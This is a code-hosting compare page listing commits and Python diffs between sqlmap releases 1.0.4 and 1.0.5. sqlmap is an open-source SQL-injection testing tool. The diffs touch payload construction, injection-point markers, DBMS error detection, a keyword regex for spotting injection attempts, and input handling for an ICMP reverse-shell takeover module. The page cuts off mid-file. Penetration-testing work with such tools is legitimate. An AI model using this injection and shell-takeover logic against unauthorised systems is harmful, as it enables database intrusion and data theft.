PenTest/sqlmap
1
0
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-12-07 13:11:29 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:1.0.4
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9
...
compare: PenTest:1.0.5
Branches Tags
PenTest:master PenTest:gh-pages
PenTest:1.9.12 PenTest:1.9.11 PenTest:1.9.10 PenTest:1.9.9 PenTest:1.9.8 PenTest:1.9.7 PenTest:1.9.6 PenTest:1.9.5 PenTest:1.9.4 PenTest:1.9.3 PenTest:1.9.2 PenTest:1.9 PenTest:1.8.12 PenTest:1.8.11 PenTest:1.8.10 PenTest:1.8.9 PenTest:1.8.8 PenTest:1.8.7 PenTest:1.8.6 PenTest:1.8.5 PenTest:1.8.4 PenTest:1.8.3 PenTest:1.8.2 PenTest:1.8 PenTest:1.8.1 PenTest:1.7.1 PenTest:1.7.12 PenTest:1.7.11 PenTest:1.7.10 PenTest:1.7.9 PenTest:1.7.8 PenTest:1.7.7 PenTest:1.7.6 PenTest:1.7.5 PenTest:1.7.4 PenTest:1.7.3 PenTest:1.7.2 PenTest:1.7 PenTest:1.6.12 PenTest:1.6.11 PenTest:1.6.10 PenTest:1.6.9 PenTest:1.6.8 PenTest:1.6.7 PenTest:1.6.6 PenTest:1.6.5 PenTest:1.6.4 PenTest:1.6.3 PenTest:1.6.2 PenTest:1.6 PenTest:1.5.12 PenTest:1.5.11 PenTest:1.5.10 PenTest:1.5.9 PenTest:1.5.8 PenTest:1.5.7 PenTest:1.5.6 PenTest:1.5.5 PenTest:1.5.4 PenTest:1.5.3 PenTest:1.5.2 PenTest:1.5 PenTest:1.4.12 PenTest:1.4.11 PenTest:1.4.10 PenTest:1.4.9 PenTest:1.4.8 PenTest:1.4.7 PenTest:1.4.6 PenTest:1.4.5 PenTest:1.4.4 PenTest:0.19 PenTest:1.4.3 PenTest:1.4.2 PenTest:1.4 PenTest:1.3.12 PenTest:1.3.11 PenTest:1.3.10 PenTest:1.3.9 PenTest:1.3.8 PenTest:1.3.7 PenTest:1.3.6 PenTest:1.3.5 PenTest:1.3.4 PenTest:1.3.3 PenTest:1.3.2 PenTest:1.3 PenTest:1.2.12 PenTest:1.2.11 PenTest:1.2.10 PenTest:1.2.9 PenTest:1.2.8 PenTest:1.2.7 PenTest:1.2.6 PenTest:1.2.5 PenTest:1.2.4 PenTest:1.2.3 PenTest:1.2.2 PenTest:1.2 PenTest:1.1.12 PenTest:1.1.11 PenTest:1.1.10 PenTest:1.1.9 PenTest:1.1.8 PenTest:1.1.7 PenTest:1.1.6 PenTest:1.1.5 PenTest:1.1.4 PenTest:1.1.3 PenTest:1.1.2 PenTest:1.1 PenTest:1.0.12 PenTest:1.0.11 PenTest:1.0.10 PenTest:1.0.9 PenTest:1.0.8 PenTest:1.0.7 PenTest:1.0.6 PenTest:1.0.5 PenTest:1.0.4 PenTest:1.0.3 PenTest:1.0 PenTest:0.6.2 PenTest:0.6.3 PenTest:0.6.4 PenTest:0.7-rc1 PenTest:0.8-rc2 PenTest:0.8-rc3 PenTest:0.7 PenTest:0.8-rc4 PenTest:0.8 PenTest:0.9

26 Commits
1.0.4 ... 1.0.5

Author SHA1 Message Date
Miroslav Stampar
d7f0b3566d Automatic monthly tagging 2016-05-02 10:06:30 +02:00
Miroslav Stampar
0c67a90cc0 Minor bug fix 2016-05-02 10:06:30 +02:00
Miroslav Stampar
f06e498fb0 Implementation for an Issue #1826 2016-04-29 14:19:32 +02:00
Miroslav Stampar
ad612bf9e4 Patch for Windows banner display 2016-04-29 00:51:20 +02:00
Miroslav Stampar
9dd5cd8eb6 Removing CloudFlare check 2016-04-29 00:17:07 +02:00
Miroslav Stampar
5ed3cdc819 Minor update 2016-04-22 10:54:55 +02:00
Miroslav Stampar
e07c92bce5 Minor change on banner showing up 2016-04-19 13:45:49 +02:00
Miroslav Stampar
0c5965c7b8 Minor patches 2016-04-19 13:13:37 +02:00
Miroslav Stampar
aa21550712 Minor patch for integer casting heuristics (circumvent auto-casting by DBMS itself) 2016-04-15 13:47:19 +02:00
Miroslav Stampar
66061e8c5f Fixes #1811 2016-04-15 12:04:54 +02:00
Miroslav Stampar
c4b74c2e01 Fixes #1810 2016-04-12 22:37:14 +02:00
Miroslav Stampar
55b23e78ee Fixes #1809 2016-04-12 22:10:26 +02:00
Miroslav Stampar
a9526bda92 Minor patch 2016-04-11 22:38:44 +02:00
Miroslav Stampar
0901da3f83 Update for an Issue #1807 2016-04-11 09:43:50 +02:00
Miroslav Stampar
8004652f7b Some more optimization 2016-04-08 15:30:25 +02:00
Miroslav Stampar
c9b410c97f Minor update 2016-04-08 14:59:52 +02:00
Miroslav Stampar
814d710320 Minor speed up 2016-04-08 14:41:34 +02:00
Miroslav Stampar
38fcc5a35a Update for pre-WHERE payloads 2016-04-08 13:19:42 +02:00
Miroslav Stampar
674d516f3e Minor patch 2016-04-08 11:40:09 +02:00
Miroslav Stampar
8ceb4907a5 Another update for Issue #1800 2016-04-08 11:37:38 +02:00
Miroslav Stampar
ce3749622a Minor revisit of payload boundaries (Issue #1800) 2016-04-08 11:28:17 +02:00
Miroslav Stampar
bcfae99701 Adding new WAF script 2016-04-08 10:32:18 +02:00
Miroslav Stampar
44c1c2c6f0 Minor update (reported via email) 2016-04-06 11:43:53 +02:00
Miroslav Stampar
ac08db82b2 Including one more error regex (based on testasp[.]vulnweb[.]com) 2016-04-04 16:14:30 +02:00
Miroslav Stampar
305bfd9d30 Implements #1763 2016-04-04 13:50:10 +02:00
Miroslav Stampar
f9aaec7b4a Minor patch (binary extensions) 2016-04-04 12:43:53 +02:00
34 changed files with 358 additions and 291 deletions
Expand all files Collapse all files

8
lib/controller/checks.py
View File

@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
import copy
import httplib
import random
import re
import socket
import time
@@ -62,7 +63,6 @@ from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CLOUDFLARE_SERVER_HEADER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
@@ -906,7 +906,7 @@ def heuristicCheckSqlInjection(place, parameter):
if not result:
randStr = randomStr()
payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix)
payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
casting = Request.queryPage(payload, place, raise404=False)
@@ -1383,10 +1383,6 @@ def checkConnection(suppressOutput=False):
else:
kb.errorIsNone = True
if headers and headers.get("Server", "") == CLOUDFLARE_SERVER_HEADER:
warnMsg = "CloudFlare response detected"
logger.warn(warnMsg)
except SqlmapConnectionException, ex:
if conf.ipv6:
warnMsg = "check connection to a provided "

2
lib/controller/controller.py
View File

@@ -521,7 +521,7 @@ def start():
injection = checkSqlInjection(place, parameter, value)
proceed = not kb.endDetection
if injection is not None and injection.place is not None:
if getattr(injection, "place", None) is not None:
kb.injections.append(injection)
# In case when user wants to end detection phase (Ctrl+C)

17
lib/core/agent.py
View File

@@ -35,10 +35,12 @@ from lib.core.enums import PLACE
from lib.core.enums import POST_HINT
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import NULL
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import REPLACEMENT_MARKER
from lib.core.unescaper import unescaper
@@ -95,9 +97,12 @@ class Agent(object):
paramDict = conf.paramDict[place]
origValue = getUnicode(paramDict[parameter])
if place == PLACE.URI:
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
paramString = origValue
if place == PLACE.URI:
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
else:
origValue = re.search(r"\w+\Z", origValue.split(BOUNDED_INJECTION_MARKER)[0]).group(0)
origValue = origValue[origValue.rfind('/') + 1:]
for char in ('?', '=', ':'):
if char in origValue:
@@ -161,6 +166,9 @@ class Agent(object):
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
retVal = "%s=%s" % (parameter, paramString.replace(_, self.addPayloadDelimiters(newValue)))
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
else:
@@ -273,7 +281,7 @@ class Agent(object):
where = kb.injection.data[kb.technique].where if where is None else where
comment = kb.injection.data[kb.technique].comment if comment is None else comment
if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
if Backend.getIdentifiedDbms() == DBMS.ACCESS and "--" in (comment or ""):
comment = queries[DBMS.ACCESS].comment.query
if comment is not None:
@@ -296,7 +304,7 @@ class Agent(object):
_ = (
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
("[HASH_REPLACE]", kb.chars.hash_),
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
)
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
@@ -747,6 +755,9 @@ class Agent(object):
intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)]
position = 0
char = NULL
for element in xrange(0, count):
if element > 0:
unionQuery += ','

49
lib/core/common.py
View File

@@ -91,6 +91,7 @@ from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict
from lib.core.settings import BANNER
from lib.core.settings import BOLD_PATTERNS
from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
@@ -151,6 +152,7 @@ from lib.core.threads import getCurrentThreadData
from lib.utils.sqlalchemy import _sqlalchemy
from thirdparty.clientform.clientform import ParseResponse
from thirdparty.clientform.clientform import ParseError
from thirdparty.colorama.initialise import init as coloramainit
from thirdparty.magic import magic
from thirdparty.odict.odict import OrderedDict
from thirdparty.termcolor.termcolor import colored
@@ -598,6 +600,17 @@ def paramToDict(place, parameters=None):
warnMsg += "so sqlmap could be able to run properly"
logger.warn(warnMsg)
if place in (PLACE.POST, PLACE.GET):
regex = r"\A([^\w]+.*\w+)([^\w]+)\Z"
match = re.search(regex, testableParameters[parameter])
if match:
_ = re.sub(regex, "\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, testableParameters[parameter])
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % _
test = readInput(message, default="N")
if test[0] in ("y", "Y"):
testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])
if conf.testParameter and not testableParameters:
paramStr = ", ".join(test for test in conf.testParameter)
@@ -968,7 +981,12 @@ def randomRange(start=0, stop=1000, seed=None):
423
"""
randint = random.WichmannHill(seed).randint if seed is not None else random.randint
if seed is not None:
_ = getCurrentThreadData().random
_.seed(seed)
randint = _.randint
else:
randint = random.randint
return int(randint(start, stop))
@@ -981,7 +999,12 @@ def randomInt(length=4, seed=None):
874254
"""
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
if seed is not None:
_ = getCurrentThreadData().random
_.seed(seed)
choice = _.choice
else:
choice = random.choice
return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
@@ -994,7 +1017,12 @@ def randomStr(length=4, lowercase=False, alphabet=None, seed=None):
'RNvnAv'
"""
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
if seed is not None:
_ = getCurrentThreadData().random
_.seed(seed)
choice = _.choice
else:
choice = random.choice
if alphabet:
retVal = "".join(choice(alphabet) for _ in xrange(0, length))
@@ -1053,9 +1081,14 @@ def banner():
This function prints sqlmap banner with its version
"""
if not any(_ in sys.argv for _ in ("--version", "--pickled-options")):
_ = BANNER
if not getattr(LOGGER_HANDLER, "is_tty", False):
if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv:
_ = re.sub("\033.+?m", "", _)
elif IS_WIN:
coloramainit()
dataToStdout(_, forceOutput=True)
def parsePasswordHash(password):
@@ -3147,14 +3180,6 @@ def intersect(valueA, valueB, lowerCase=False):
return retVal
def cpuThrottle(value):
"""
Does a CPU throttling for lesser CPU consumption
"""
delay = 0.00001 * (value ** 2)
time.sleep(delay)
def removeReflectiveValues(content, payload, suppressWarning=False):
"""
Neutralizes reflective values in a given content based on a payload

1
lib/core/convert.py
View File

@@ -11,7 +11,6 @@ import pickle
import re
import StringIO
import sys
import types
from lib.core.settings import IS_WIN
from lib.core.settings import UNICODE_ENCODING

1
lib/core/defaults.py
View File

@@ -11,7 +11,6 @@ _defaults = {
"csvDel": ",",
"timeSec": 5,
"googlePage": 1,
"cpuThrottle": 5,
"verbose": 1,
"delay": 0,
"timeout": 30,

8
lib/core/option.py
View File

@@ -151,7 +151,6 @@ from lib.utils.crawler import crawl
from lib.utils.deps import checkDependencies
from lib.utils.search import search
from lib.utils.purge import purge
from thirdparty.colorama.initialise import init as coloramainit
from thirdparty.keepalive import keepalive
from thirdparty.oset.pyoset import oset
from thirdparty.socks import socks
@@ -2331,10 +2330,6 @@ def _basicOptionValidation():
errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
raise SqlmapSyntaxException(errMsg)
if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0):
errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]"
raise SqlmapSyntaxException(errMsg)
if conf.textOnly and conf.nullConnection:
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
@@ -2536,9 +2531,6 @@ def _resolveCrossReferences():
lib.controller.checks.setVerbosity = setVerbosity
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
if IS_WIN:
coloramainit()
_setConfAttributes()
_setKnowledgeBaseAttributes()
_mergeOptions(inputOptions, overrideOptions)

1
lib/core/optiondict.py
View File

@@ -230,7 +230,6 @@ optDict = {
"disablePrecon": "boolean",
"binaryFields": "string",
"profile": "boolean",
"cpuThrottle": "integer",
"forceDns": "boolean",
"identifyWaf": "boolean",
"skipWaf": "boolean",

13
lib/core/settings.py
View File

@@ -10,7 +10,6 @@ import re
import subprocess
import string
import sys
import time
import types
from lib.core.datatype import AttribDict
@@ -20,7 +19,7 @@ from lib.core.enums import OS
from lib.core.revision import getRevisionNumber
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.0.4.0"
VERSION = "1.0.5.0"
REVISION = getRevisionNumber()
STABLE = VERSION.count('.') <= 2
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
@@ -61,6 +60,7 @@ PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
URI_QUESTION_MARKER = "__QUESTION_MARK__"
ASTERISK_MARKER = "__ASTERISK_MARK__"
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
RANDOM_INTEGER_MARKER = "[RANDINT]"
RANDOM_STRING_MARKER = "[RANDSTR]"
@@ -313,9 +313,6 @@ BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
# Regex used for parsing XML Burp saved history items
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
# Server header in CloudFlare responses
CLOUDFLARE_SERVER_HEADER = "cloudflare-nginx"
# Encoding used for Unicode data
UNICODE_ENCODING = "utf8"
@@ -448,7 +445,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
# Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
# Patterns often seen in HTTP headers containing custom injection marking character
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
@@ -533,7 +530,7 @@ HASHDB_FLUSH_RETRIES = 3
HASHDB_END_TRANSACTION_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10))
HASHDB_MILESTONE_VALUE = "WVMqopmuzX" # "".join(random.sample(string.ascii_letters, 10))
# Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -578,7 +575,7 @@ MAX_BISECTION_LENGTH = 50 * 1024 * 1024
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
# Generic SQL comment formation
GENERIC_SQL_COMMENT = "-- -"
GENERIC_SQL_COMMENT = "-- [RANDSTR]"
# Threshold value for turning back on time auto-adjustment mechanism
VALID_TIME_CHARS_RUN_THRESHOLD = 100

2
lib/core/threads.py
View File

@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
"""
import difflib
import random
import threading
import time
import traceback
@@ -51,6 +52,7 @@ class _ThreadData(threading.local):
self.lastRequestMsg = None
self.lastRequestUID = 0
self.lastRedirectURL = None
self.random = random.WichmannHill()
self.resumed = False
self.retriesCount = 0
self.seqMatcher = difflib.SequenceMatcher(None)

1
lib/core/wordlist.py
View File

@@ -11,7 +11,6 @@ import zipfile
from lib.core.common import getSafeExString
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapInstallationException
from lib.core.settings import UNICODE_ENCODING
class Wordlist(object):
"""

3
lib/parse/cmdline.py
View File

@@ -763,9 +763,6 @@ def cmdLineParser(argv=None):
parser.add_option("--binary-fields", dest="binaryFields",
help=SUPPRESS_HELP)
parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int",
help=SUPPRESS_HELP)
parser.add_option("--force-dns", dest="forceDns", action="store_true",
help=SUPPRESS_HELP)

14
lib/parse/html.py
View File

@@ -24,7 +24,8 @@ class HTMLHandler(ContentHandler):
ContentHandler.__init__(self)
self._dbms = None
self._page = page
self._page = (page or "")
self._lower_page = self._page.lower()
self.dbms = None
@@ -33,11 +34,20 @@ class HTMLHandler(ContentHandler):
threadData.lastErrorPage = (threadData.lastRequestUID, self._page)
def startElement(self, name, attrs):
if self.dbms:
return
if name == "dbms":
self._dbms = attrs.get("value")
elif name == "error":
if re.search(attrs.get("regexp"), self._page, re.I):
regexp = attrs.get("regexp")
if regexp not in kb.cache.regex:
keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp))
keywords = sorted(keywords, key=len)
kb.cache.regex[regexp] = keywords[-1].lower()
if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
self.dbms = self._dbms
self._markAsErrorPage()

2
lib/request/basic.py
View File

@@ -150,7 +150,7 @@ def checkCharEncoding(encoding, warn=True):
return encoding
# Reference: http://www.destructor.de/charsets/index.htm
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
for delimiter in (';', ',', '('):
if delimiter in encoding:

3
lib/request/connect.py
View File

@@ -32,7 +32,6 @@ from lib.core.agent import agent
from lib.core.common import asciifyUrl
from lib.core.common import calculateDeltaSeconds
from lib.core.common import clearConsoleLine
from lib.core.common import cpuThrottle
from lib.core.common import dataToStdout
from lib.core.common import evaluateCode
from lib.core.common import extractRegexResult
@@ -220,8 +219,6 @@ class Connect(object):
if isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay)
elif conf.cpuThrottle:
cpuThrottle(conf.cpuThrottle)
if conf.offline:
return None, None, None

20
lib/takeover/icmpsh.py
View File

@@ -6,6 +6,8 @@ See the file 'doc/COPYING' for copying permission
"""
import os
import re
import socket
import time
from extra.icmpsh.icmpsh_m import main as icmpshmaster
@@ -54,15 +56,29 @@ class ICMPsh:
if self.localIP:
message += "[Enter for '%s' (detected)] " % self.localIP
while not address:
address = readInput(message, default=self.localIP)
valid = None
while not valid:
valid = True
address = readInput(message, default=self.localIP or "")
try:
socket.inet_aton(address)
except socket.error:
valid = False
finally:
valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None
if conf.batch and not address:
raise SqlmapDataException("local host address is missing")
elif address and not valid:
warnMsg = "invalid local host address"
logger.warn(warnMsg)
return address
def _prepareIngredients(self, encode=True):
self.localIP = getattr(self, "localIP", None)
self.remoteIP = getattr(self, "remoteIP", None)
self.lhostStr = ICMPsh._selectLhost(self)
self.rhostStr = ICMPsh._selectRhost(self)

5
lib/techniques/blind/inference.py
View File

@@ -5,11 +5,9 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
import threading
import time
from extra.safe2bin.safe2bin import safechardecode
from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.common import Backend
@@ -20,13 +18,11 @@ from lib.core.common import decodeIntToUnicode
from lib.core.common import filterControlChars
from lib.core.common import getCharset
from lib.core.common import getCounter
from lib.core.common import getUnicode
from lib.core.common import goGoodSamaritan
from lib.core.common import getPartRun
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import incrementCounter
from lib.core.common import randomInt
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
@@ -44,7 +40,6 @@ from lib.core.settings import INFERENCE_UNKNOWN_CHAR
from lib.core.settings import INFERENCE_GREATER_CHAR
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import MAX_BISECTION_LENGTH
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
from lib.core.settings import NULL

3
lib/utils/hash.py
View File

@@ -45,6 +45,7 @@ from lib.core.common import dataToStdout
from lib.core.common import getFileItems
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import normalizeUnicode
@@ -490,7 +491,7 @@ def attackDumpedTable():
for (_, hash_, password) in results:
if hash_:
lut[hash_.lower()] = password
lut[hash_.lower()] = getUnicode(password)
infoMsg = "postprocessing table dump"
logger.info(infoMsg)

2
lib/utils/hashdb.py
View File

